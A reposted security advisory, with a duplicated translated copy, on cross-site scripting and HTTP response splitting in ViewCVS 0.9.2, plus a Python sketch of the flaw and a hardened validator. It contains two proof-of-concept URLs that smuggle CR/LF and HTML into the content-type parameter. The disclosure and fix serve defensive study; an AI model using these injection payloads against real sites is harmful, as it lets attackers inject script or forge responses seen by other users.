
[Repost] Two security vulnerabilities in ViewCVS and how to test them

Source: www.securityfocus.com

---------------------------------------------------------------------------
Two Vulnerabilities in ViewCVS
---------------------------------------------------------------------------

Author: Jose Antonio Coret (Joxean Koret)
Date: 2004
Location: Basque Country

---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ViewCVS 0.9.2 - ViewCVS is a browser interface for CVS and Subversion
version control repositories

ViewCVS can browse directories, change logs, and revisions of files. It
can display diffs between versions and show selections of files based on
tags or branches. In addition, ViewCVS has "annotation" / "blame"
support, and a Bonsai-like query facility.

Web : http://viewcvs.sourceforge.net

---------------------------------------------------------------------------

Vulnerabilities:
~~~~~~~~~~~~~~~~

A. Cross Site Scripting Vulnerability and/or HTTP Response Splitting

A1. When you want to view any source file that is stored in the CVS
repository you can select the mime-type to view it with (for example,
text/html or text/plain). This is a parameter that the viewcvs.py script
receives, and it is not verified.

I'm not sure if this is an HTTP Response Splitting vulnerability and/or
a Cross Site Scripting vulnerability, but it is a security problem.

To try the vulnerabilities you can use the following Proofs of
Concept:

Sample 1 :
~~~~~~~~~~


http://<site-with-viewcvs-092 ... v=HEAD&content-type=text/html%0d%0a%0d%0a<html><body%20bgcolor="black"><font%20size=7%20color=red>XSS%20or%20HTTP%20Response%20Splitting</font></html>

Sample 2 :
~~~~~~~~~~


http://<site-with-viewcvs-092>/cgi-bin/viewcvs/*checkout*/project/source.file?rev=1.0&content-type=text/html%0d%0aContent-Length:1937%0d%0a%0d%0aHi


The fix:
~~~~~~~~

The vendor was contacted but no patch for the 0.9.2 version has been
released. Anyway, the problems have been fixed in the ViewCVS 1.0-dev
version available via CVS.

Disclaimer:
~~~~~~~~~~~

The information in this advisory and any of its demonstrations is
provided "as is" without any warranty of any kind.

I am not liable for any direct or indirect damages caused as a result of
using the information or demonstrations provided in any part of this
advisory.

---------------------------------------------------------------------------

Contact:
~~~~~~~~

Joxean Koret at joxeanpiti<<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es

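The root cause described in the advisory is a CGI script copying a query parameter straight into the Content-Type header, so a URL-encoded CR/LF pair (%0d%0a) ends the header block early and lets the attacker append headers or a body of their own. The following is an added example, not code from the advisory or from ViewCVS itself: a hypothetical model of the unvalidated header write, fed the two Proof-of-Concept query strings (constructed here from the advisory's URLs; Sample 1's path is truncated in the advisory, so the "rev=HEAD" prefix is an assumption), next to a hardened version that rejects CR/LF and accepts only a bare type/subtype from a hypothetical allowlist. The response parser at the end shows what a client would see in each case.

```python
import re
from urllib.parse import parse_qs

# Constructed query strings modelled on the advisory's two PoC URLs (the part
# after '?'). Sample 1's URL is truncated in the advisory, so 'rev=HEAD' is an
# assumption; the content-type value is taken from the advisory as given.
SAMPLE1_QUERY = ('rev=HEAD&content-type=text/html%0d%0a%0d%0a'
                 '<html><body%20bgcolor="black"><font%20size=7%20color=red>'
                 'XSS%20or%20HTTP%20Response%20Splitting</font></html>')
SAMPLE2_QUERY = ('rev=1.0&content-type=text/html%0d%0a'
                 'Content-Length:1937%0d%0a%0d%0aHi')

# Constructed stand-in for the checked-out file the CGI would normally return.
FILE_BODY = 'print "hello"\n'


def requested_content_type(query):
    """Return the URL-decoded content-type parameter, or None if absent."""
    params = parse_qs(query, keep_blank_values=True)
    values = params.get('content-type')
    return values[0] if values else None


def vulnerable_response(query, body=FILE_BODY):
    """Hypothetical model of the flawed behaviour: the decoded parameter is
    written into the Content-Type header with no validation, so a CR/LF inside
    it terminates the header line (and, with a second CR/LF, the whole header
    block) before the real body is appended."""
    ctype = requested_content_type(query) or 'text/plain'
    return 'Content-Type: ' + ctype + '\r\n\r\n' + body


# Hardened variant: CR/LF is refused outright, the value must be a single
# type/subtype token pair, and it must be on an explicit (hypothetical) allowlist.
ALLOWED_TYPES = {'text/plain', 'text/html'}
_TOKEN = r"[A-Za-z0-9!#$%&'*+.^_`|~-]+"   # RFC 2045 token characters
_MIME_RE = re.compile('^' + _TOKEN + '/' + _TOKEN + '$')


def safe_content_type(requested, default='text/plain'):
    """Validate a client-supplied media type; raise ValueError on anything
    that could reach the header line unchanged and alter the response."""
    if requested is None:
        return default
    if '\r' in requested or '\n' in requested:
        raise ValueError('CR/LF in content-type')
    if not _MIME_RE.match(requested):
        raise ValueError('malformed media type')
    ctype = requested.lower()
    if ctype not in ALLOWED_TYPES:
        raise ValueError('media type not allowed: ' + ctype)
    return ctype


def hardened_response(query, body=FILE_BODY):
    """Same response shape as vulnerable_response, but only after validation."""
    ctype = safe_content_type(requested_content_type(query))
    return 'Content-Type: ' + ctype + '\r\n\r\n' + body


def rejected(query):
    """True if the hardened path refuses to serve the request at all."""
    try:
        hardened_response(query)
        return False
    except ValueError:
        return True


def parse_response(raw):
    """Split a raw CGI response the way a client would: header lines up to the
    first blank line, everything after it is the body."""
    head, _, body = raw.partition('\r\n\r\n')
    headers = {}
    for line in head.split('\r\n'):
        name, _, value = line.partition(':')
        headers[name.strip()] = value.strip()
    return headers, body


if __name__ == '__main__':
    for label, query in (('Sample 1', SAMPLE1_QUERY), ('Sample 2', SAMPLE2_QUERY)):
        headers, body = parse_response(vulnerable_response(query))
        print(label, 'vulnerable headers:', headers)
        print(label, 'vulnerable body starts with:', repr(body[:40]))
        print(label, 'hardened rejects it:', rejected(query))
```

Running it shows the two effects the advisory describes: with Sample 1 the client sees a clean `Content-Type: text/html` header followed by the attacker's HTML as the body (the real file trails behind a second blank line), which is the XSS reading; with Sample 2 the injected `Content-Length: 1937` becomes a genuine response header, which is the response-splitting reading. The hardened path refuses both; note that it also lowercases the value before the allowlist check, so a client asking for `TEXT/Plain` still gets `text/plain` rather than a bypass.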

Translation site: http://www.bnso.net
Bug.Center.Team translation group

Two Vulnerabilities in ViewCVS
Advisory: <1104609524.17665.4.camel () nemobox>
Published: 2005-01-01 20:03:05
Reported by: Jose Antonio Coret (Joxean Koret)
Affected software: ViewCVS 0.9.2
Software description: ViewCVS is a browser interface for CVS and Subversion version control repositories.
ViewCVS can browse directories, change logs and file revisions. It can display diffs between versions and show selections of files based on tags or branches.
In addition, ViewCVS has "annotation" / "blame" support, and a Bonsai-like query facility.
Site: http://viewcvs.sourceforge.net

--------------------------------------------------------------------------
Vulnerability description: cross-site scripting vulnerability / HTTP response splitting vulnerability
When you view any source file stored in the CVS repository, you can choose the MIME type to view the file with (for example, text/html or text/plain).
This is a parameter received by the viewcvs.py script, and it is not validated.
I am not sure whether this is an HTTP response splitting vulnerability or a cross-site scripting vulnerability, but it is certainly a security problem.
You can use the following examples to test this vulnerability:
Example 1:
http://<site-with-viewcvs-092 ... HEAD&content-type=text/html%0d%0a%0d%0a<html><body%20bgcolor="black"><font%20size=7%20color=red>XSS%20or%20HTTP%20Response%20Splitting</font></html>
Example 2:
http://<site-with-viewcvs-092>/cgi-bin/viewcvs/*checkout*/project/source.file?rev=1.0&content-type=text/html%0d%0aContent-Length:1937%0d%0a%0d%0aHi

Fix:
The vendor is aware of the problem, but there is currently no patch for version 0.9.2.
Workaround: upgrade to the ViewCVS 1.0-dev version.
